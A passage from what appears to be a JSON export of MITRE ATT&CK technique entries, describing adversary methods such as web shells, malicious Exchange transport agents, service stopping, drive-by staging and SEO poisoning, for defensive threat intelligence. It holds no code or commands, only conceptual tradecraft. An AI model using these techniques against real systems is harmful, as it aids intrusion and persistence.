RDP](https://app.tidalcyber.com/references/335480f8-8f40-4da7-b083-6a4b158496c1)]</sup><sup>[[RDPWrap Github](https://app.tidalcyber.com/references/777a0a6f-3684-4888-ae1b-adc386be763a)]</sup> On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1505.005"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "ae967542-1f37-4eea-993d-fff3867f2aea",
"value": "Terminal Services DLL"
},
{
"description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.<sup>[[Microsoft TransportAgent Jun 2016](https://app.tidalcyber.com/references/16ae3e7e-5f0d-4ca9-8453-be960b2111b6)]</sup><sup>[[ESET LightNeuron May 2019](https://app.tidalcyber.com/references/679aa333-572c-44ba-b94a-606f168d1ed2)]</sup> Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \n\nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.<sup>[[ESET LightNeuron May 2019](https://app.tidalcyber.com/references/679aa333-572c-44ba-b94a-606f168d1ed2)]</sup> Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1505.002"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "c2be31d9-c800-4cc7-81b9-f3fdb94fbb43",
"value": "Transport Agent"
},
{
"description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup>\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://app.tidalcyber.com/software/723c5ab7-23ca-46f2-83bb-f1d1e550122c) Web shell client).<sup>[[Lee 2013](https://app.tidalcyber.com/references/6d1e2b0a-fed2-490b-be25-6580dfb7d6aa)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1505.003"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "05a5318f-476d-44c1-8a85-9466295d31dd",
"value": "Web Shell"
},
{
"description": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "e4495b87-9b04-4313-b771-7d9703639cce",
"type": "similar"
},
{
"dest-uuid": "35197aee-8cc9-4584-bd22-33c8885db669",
"type": "similar"
},
{
"dest-uuid": "ae967542-1f37-4eea-993d-fff3867f2aea",
"type": "similar"
},
{
"dest-uuid": "c2be31d9-c800-4cc7-81b9-f3fdb94fbb43",
"type": "similar"
},
{
"dest-uuid": "05a5318f-476d-44c1-8a85-9466295d31dd",
"type": "similar"
}
],
"uuid": "03fb32fa-cdee-4e94-ae3e-16b51a10ba9c",
"value": "Server Software Component"
},
{
"description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup> \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible <sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup>. In some cases, adversaries may stop or disable many or all services to render systems unusable.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) or [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) on the data stores of services like Exchange and SQL Server.<sup>[[SecureWorks WannaCry Analysis](https://app.tidalcyber.com/references/522b2a19-1d15-48f8-8801-c64d3abd945a)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "e27c5756-f43e-424f-af62-b21e8b304e5d",
"value": "Service Stop"
},
{
"description": "Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)).\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.\n\nThe Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.<sup>[[Apple Dev Dynamic Libraries](https://app.tidalcyber.com/references/39ffd162-4052-57ec-bd20-2fe6b8e6beab)]</sup><sup>[[Linux Shared Libraries](https://app.tidalcyber.com/references/054d769a-f88e-55e9-971a-f169ee434cfe)]</sup><sup>[[RotaJakiro 2021 netlab360 analysis](https://app.tidalcyber.com/references/7a9c53dd-2c0e-5452-9ee2-01531fbf8ba8)]</sup><sup>[[Unit42 OceanLotus 2017](https://app.tidalcyber.com/references/fcaf57f1-6696-54a5-a78c-255c8f6ac235)]</sup>\n\nThe Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) which is called from functions like `LoadLibrary` at run time.<sup>[[Microsoft DLL](https://app.tidalcyber.com/references/f0ae2788-537c-5644-ba1b-d06a612e73c1)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "8941d1f4-d80c-4aaa-821a-a059c2a0f854",
"value": "Shared Modules"
},
{
"description": "Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). \n\nAccess to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. Network infrastructure may also have administration tools that can be similarly abused by adversaries. <sup>[[Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation](https://app.tidalcyber.com/references/a43dd8ce-23d6-5768-8522-6973dc45e1ac)]</sup>\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "1bcf9fb5-6848-44d9-b394-ffbd3c357058",
"value": "Software Deployment Tools"
},
{
"description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://app.tidalcyber.com/software/803192b8-747b-4108-ae15-2d7481d39162), <code>reg query</code> with [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532), <code>dir</code> with [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8), and [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup> For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the <code>DescribeSecurityGroups</code> action with various request parameters. <sup>[[DescribeSecurityGroups - Amazon Elastic Compute Cloud](https://app.tidalcyber.com/references/aa953df5-40b5-42d2-9e33-a227a093497f)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1518.001"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "9e945aa5-3883-4537-a767-f49bdcce26c7",
"value": "Security Software Discovery"
},
{
"description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://app.tidalcyber.com/technique/e9bff6ff-3142-4910-8f67-19b868912602) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c).",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
},
{
"dest-uuid": "9e945aa5-3883-4537-a767-f49bdcce26c7",
"type": "similar"
}
],
"uuid": "e9bff6ff-3142-4910-8f67-19b868912602",
"value": "Software Discovery"
},
{
"description": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc). Prior to [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or previously compromised ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)).\n\nAdversaries may upload or inject malicious web content, such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc), into websites.<sup>[[FireEye CFR Watering Hole 2012](https://app.tidalcyber.com/references/6108ab77-e4fd-43f2-9d49-8ce9c219ca9c)]</sup><sup>[[Gallagher 2015](https://app.tidalcyber.com/references/b1540c5c-0bbc-4b9d-9185-fae224ba31be)]</sup> This may be done in a number of ways, including:\n\n* Inserting malicious scripts into web pages or other user controllable web content such as forum posts\n* Modifying script files served to websites from publicly writeable cloud storage buckets\n* Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://app.tidalcyber.com/technique/60ac24aa-ce63-5c1d-8126-db20a27d85be))\n\nIn addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://app.tidalcyber.com/technique/4acf57da-73c1-4555-a86a-38ea4a8b962d)) to ensure it is vulnerable prior to attempting exploitation.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup>\n\nWebsites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to help facilitate [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1608.004"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "f2661f07-9027-4d19-9028-d07b7511f3d5",
"value": "Drive-by Target"
},
{
"description": "Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.<sup>[[DigiCert Install SSL Cert](https://app.tidalcyber.com/references/a1d7d368-6092-4421-99de-44e458deee21)]</sup>\n\nAdversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. \n\nAdversaries can obtain digital certificates (see [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58)) or create self-signed certificates (see [Digital Certificates](https://app.tidalcyber.com/technique/5bcbb0c5-7061-481f-a677-09028a6c59f7)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or previously compromised ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1608.003"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b",
"value": "Install Digital Certificate"
},
{
"description": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://app.tidalcyber.com/technique/46f60fff-71a1-4cfd-b639-71a0ac903bbb). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://app.tidalcyber.com/technique/4a68c72c-79c1-4fed-9107-75bb5b06dfc3)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d)), an adversary must set up the resources for a link target for the spearphishing link. \n\nTypically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://app.tidalcyber.com/technique/4a68c72c-79c1-4fed-9107-75bb5b06dfc3).<sup>[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]</sup><sup>[[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)]</sup> Adversaries may also [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe) and have the link target point to malware for download/execution by the user.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to help facilitate [Malicious Link](https://app.tidalcyber.com/technique/46f60fff-71a1-4cfd-b639-71a0ac903bbb). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.<sup>[[Netskope GCP Redirection](https://app.tidalcyber.com/references/18efeffc-c47b-46ad-8e7b-2eda30a406f0)]</sup><sup>[[Netskope Cloud Phishing](https://app.tidalcyber.com/references/25d46bc1-4c05-48d3-95f0-aa3ee1100bf9)]</sup><sup>[[Intezer App Service Phishing](https://app.tidalcyber.com/references/e86abbd9-f349-4d90-8ec9-899fe1637f94)]</sup> Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.<sup>[[Talos IPFS 2022](https://app.tidalcyber.com/references/dc98c7ce-0a3f-5f35-9885-6c1c73e5858d)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1608.005"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "6824c82b-2959-4402-831a-6e7c2010d1c5",
"value": "Link Target"
},
{
"description": "Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the sites ranking/score/reputation calculated by their web crawlers and algorithms.<sup>[[Atlas SEO](https://app.tidalcyber.com/references/26d7134e-7b93-4aa1-a859-03cf964ca1b5)]</sup><sup>[[MalwareBytes SEO](https://app.tidalcyber.com/references/250b09a2-dd97-4fbf-af2f-618d1f126957)]</sup>\n\nTo help facilitate [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).<sup>[[ZScaler SEO](https://app.tidalcyber.com/references/f117cfa5-1bad-43ae-9eaa-3b9123061f93)]</sup><sup>[[Atlas SEO](https://app.tidalcyber.com/references/26d7134e-7b93-4aa1-a859-03cf964ca1b5)]</sup>\n\nAdversaries may also purchase or plant incoming links to staged capabilities in order to boost the sites calculated relevance and reputation.<sup>[[MalwareBytes SEO](https://app.tidalcyber.com/references/250b09a2-dd97-4fbf-af2f-618d1f126957)]</sup><sup>[[DFIR Report Gootloader](https://app.tidalcyber.com/references/aa12dc30-ba81-46c5-b412-ca4a01e72d7f)]</sup>\n\nSEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.<sup>[[ZScaler SEO](https://app.tidalcyber.com/references/f117cfa5-1bad-43ae-9eaa-3b9123061f93)]</sup><sup>[[Sophos Gootloader](https://app.tidalcyber.com/references/63357292-0f08-4405-a45a-34b606ab7110)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1608.006"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "68d5de9f-ca86-4bd3-bf69-524d82f7bc7a",
"value": "SEO Poisoning"
},
{
"description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.<sup>[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)]</sup><sup>[[Talos IPFS 2022](https://app.tidalcyber.com/references/dc98c7ce-0a3f-5f35-9885-6c1c73e5858d)]</sup>\n\nAdversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) may increase the chance of users mistakenly executing these files.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1608.001"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe",
"value": "Upload Malware"
},
{
"description": "Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) by placing it on an Internet accessible web server.\n\nTools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)).<sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup> Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.<sup>[[Dragos Heroku Watering Hole](https://app.tidalcyber.com/references/8768909c-f511-4067-9a97-6f7dee24f276)]</sup><sup>[[Malwarebytes Heroku Skimmers](https://app.tidalcyber.com/references/4656cc2c-aff3-4416-b18d-995876d37e06)]</sup><sup>[[Intezer App Service Phishing](https://app.tidalcyber.com/references/e86abbd9-f349-4d90-8ec9-899fe1637f94)]</sup>\n\nAdversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1608.002"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "d7594eaf-286f-4484-94fa-8608c911767a",
"value": "Upload Tool"
},
{
"description": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70)) or obtained ([Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.<sup>[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)]</sup><sup>[[Dragos Heroku Watering Hole](https://app.tidalcyber.com/references/8768909c-f511-4067-9a97-6f7dee24f276)]</sup><sup>[[Malwarebytes Heroku Skimmers](https://app.tidalcyber.com/references/4656cc2c-aff3-4416-b18d-995876d37e06)]</sup><sup>[[Netskope GCP Redirection](https://app.tidalcyber.com/references/18efeffc-c47b-46ad-8e7b-2eda30a406f0)]</sup><sup>[[Netskope Cloud Phishing](https://app.tidalcyber.com/references/25d46bc1-4c05-48d3-95f0-aa3ee1100bf9)]</sup>\n\nStaging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):\n\n* Staging web resources necessary to conduct [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) when a user browses to a site.<sup>[[FireEye CFR Watering Hole 2012](https://app.tidalcyber.com/references/6108ab77-e4fd-43f2-9d49-8ce9c219ca9c)]</sup><sup>[[Gallagher 2015](https://app.tidalcyber.com/references/b1540c5c-0bbc-4b9d-9185-fae224ba31be)]</sup><sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup>\n* Staging web resources for a link target to be used with spearphishing.<sup>[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]</sup><sup>[[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)]</sup>\n* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242).<sup>[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)]</sup>\n* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)).<sup>[[DigiCert Install SSL Cert](https://app.tidalcyber.com/references/a1d7d368-6092-4421-99de-44e458deee21)]</sup>",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
},
{
"dest-uuid": "f2661f07-9027-4d19-9028-d07b7511f3d5",
"type": "similar"
},
{
"dest-uuid": "0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b",
"type": "similar"
},
{
"dest-uuid": "6824c82b-2959-4402-831a-6e7c2010d1c5",
"type": "similar"
},
{
"dest-uuid": "68d5de9f-ca86-4bd3-bf69-524d82f7bc7a",
"type": "similar"
},
{
"dest-uuid": "8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe",
"type": "similar"
},
{
"dest-uuid": "d7594eaf-286f-4484-94fa-8608c911767a",
"type": "similar"
}
],
"uuid": "ec2a76e6-3530-43e1-9e80-686e4b214ac8",
"value": "Stage Capabilities"
},
{
